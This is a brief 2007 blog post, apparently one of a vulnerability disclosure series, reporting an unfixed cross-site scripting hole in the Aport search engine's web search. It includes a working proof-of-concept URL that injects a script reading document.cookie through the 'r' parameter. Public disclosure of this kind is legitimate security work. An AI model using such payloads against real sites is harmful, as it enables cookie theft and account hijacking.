MOSEB-18: Vulnerability at aport.ru
22:17 18.06.2007Next participant of the project is Aport search engine. It is one of the popular Russian search engines.
The vulnerability is in Aport’s web search (sm.aport.ru). I already wrote about this vulnerability at aport.ru. This Cross-Site Scripting hole I found 12.09.2006, and informed vendor, but they still didn’t fix it.
XSS:
The vulnerability is in r parameter:
http://sm.aport.ru/scripts/template.dll?That=std&r=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Moral: looking for sites can be dangerous.